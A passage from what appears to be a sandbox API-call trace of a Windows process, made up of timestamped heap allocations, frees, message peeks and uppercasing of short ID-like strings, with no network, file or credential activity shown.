Flags=0x0, Size=0x20) returned 0x2a780e8 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0212.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0212.327] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0212.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0212.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0212.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0212.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0212.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0212.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0212.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0212.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0212.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0212.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0212.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0212.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0212.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0212.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0212.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0212.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0212.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0212.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0212.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0212.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0212.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0212.330] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0212.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab1d0 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0212.331] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0212.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0212.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0212.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0212.331] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x38540c8 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.332] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0212.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0212.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38540c8 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0212.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0212.334] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0212.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4b8 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854e90 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0212.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0212.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0212.334] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0212.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0212.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854e90 | out: hHeap=0x2af0000) returned 1 [0212.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 